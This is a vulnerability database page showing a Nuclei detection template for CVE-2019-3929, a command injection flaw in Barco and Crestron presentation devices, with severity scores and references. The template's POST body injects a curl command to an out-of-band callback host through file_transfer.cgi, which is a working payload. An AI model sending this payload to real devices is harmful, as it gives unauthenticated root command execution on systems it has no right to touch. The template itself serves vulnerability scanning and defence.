Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

Barco/AWIND OEM Presentation Platform - Remote Command Injection

🗓️ 16 Jun 2026 07:13:51Reported by ProjectDiscoveryType 
nuclei
 nuclei🔗 github.com👁 49 Views

Barco/AWIND OEM Presentation Platform - Remote Command Injection vulnerability in multiple product

Related
Refs
Code
ReporterTitlePublishedViews
Family
0day.today		Barco / AWIND OEM Presentation Platform Unauthenticated Remote Command Injection Vulnerability
3 May 201900:00
zdt
0day.today		Barco WePresent - file_transfer.cgi Command Injection Exploit
15 Jan 202000:00
zdt
GithubExploit		Exploit for Cross-site Scripting in Crestron Am-100_Firmware
17 Sep 201916:23
githubexploit
ATTACKERKB		CVE-2019-3929
30 Apr 201900:00
attackerkb
Tenable Nessus		WePresent file_transfer.cgi Remote Command Execution
30 Apr 201900:00
nessus
Circl		CVE-2019-3929
17 Dec 201914:15
circl
CISA KEV Catalog		Crestron Multiple Products Command Injection Vulnerability
15 Apr 202200:00
cisa_kev
Check Point Advisories		Barco EOM Presentation platform Remote Code Execution (CVE-2019-3929)
12 May 201900:00
checkpoint_advisories
CVE		CVE-2019-3929
30 Apr 201920:21
cve
Cvelist		CVE-2019-3929
30 Apr 201920:21
cvelist
Rows per page
id: CVE-2019-3929

info:
  name: Barco/AWIND OEM Presentation Platform - Remote Command Injection
  author: _0xf4n9x_
  severity: critical
  description: The Crestron AM-100 firmware 1.6.0.2, Crestron AM-101 firmware 2.7.0.1, Barco wePresent WiPG-1000P firmware 2.3.0.10, Barco wePresent WiPG-1600W before firmware 2.4.1.19, Extron ShareLink 200/250 firmware 2.0.3.4, Teq AV IT WIPS710 firmware 1.1.0.7, SHARP PN-L703WA firmware 1.4.2.3, Optoma WPS-Pro firmware 1.0.0.5, Blackbox HD WPS firmware 1.0.0.5, InFocus LiteShow3 firmware 1.0.16, and InFocus LiteShow4 2.0.0.7 are vulnerable to command injection via the file_transfer.cgi HTTP endpoint. A remote, unauthenticated attacker can use this vulnerability to execute operating system commands as root.
  impact: |
    Successful exploitation of this vulnerability could lead to unauthorized remote code execution, potentially compromising the confidentiality, integrity, and availability of the affected system.
  remediation: |
    Apply the latest security patches or updates provided by the vendor to mitigate this vulnerability.
  reference:
    - http://packetstormsecurity.com/files/152715/Barco-AWIND-OEM-Presentation-Platform-Unauthenticated-Remote-Command-Injection.html
    - https://www.exploit-db.com/exploits/46786/
    - https://nvd.nist.gov/vuln/detail/CVE-2019-3929
    - https://www.tenable.com/security/research/tra-2019-20
    - http://packetstormsecurity.com/files/155948/Barco-WePresent-file_transfer.cgi-Command-Injection.html
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cve-id: CVE-2019-3929
    cwe-id: CWE-78,CWE-79
    epss-score: 0.98952
    epss-percentile: 0.99923
    cpe: cpe:2.3:o:crestron:am-100_firmware:1.6.0.2:*:*:*:*:*:*:*
  metadata:
    max-request: 1
    vendor: crestron
    product: am-100_firmware
  tags: cve,cve2019,tenable,oast,injection,kev,edb,rce,packetstorm,crestron,vkev,vuln

http:
  - method: POST
    path:
      - "{{BaseURL}}/cgi-bin/file_transfer.cgi"

    body: "file_transfer=new&dir=%27Pa_Noteexpr%20curl%2b{{interactsh-url}}Pa_Note%27"

    headers:
      Content-Type: application/x-www-form-urlencoded

    matchers-condition: and
    matchers:
      - type: word
        part: interactsh_protocol # Confirms the HTTP Interaction
        words:
          - "http"
# digest: 490a0046304402201682800fefd786aea540bc52b588d3d1b8549abcc9d0b27b26c3e2ed05b3f97802202e6d53f32edde5d75e22e5574a3d91211295a9a59d42fad7c2d5fd4730255bb8:922c64590222798bb761d5b6d8e72950

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
04 Feb 2026 07:00Current
8.5High risk
Vulners AI Score8.5
CVSS 3.19.8
CVSS 210
EPSS0.98952
SSVC
barcoawindpresentation platformremote command injectioncrestronbarco wepresentextron sharelinkteq av itsharpoptoma wps-problackbox hd wpsinfocus liteshow3infocus liteshow4vulnerabilitycommand injectionunauthenticated attacker
49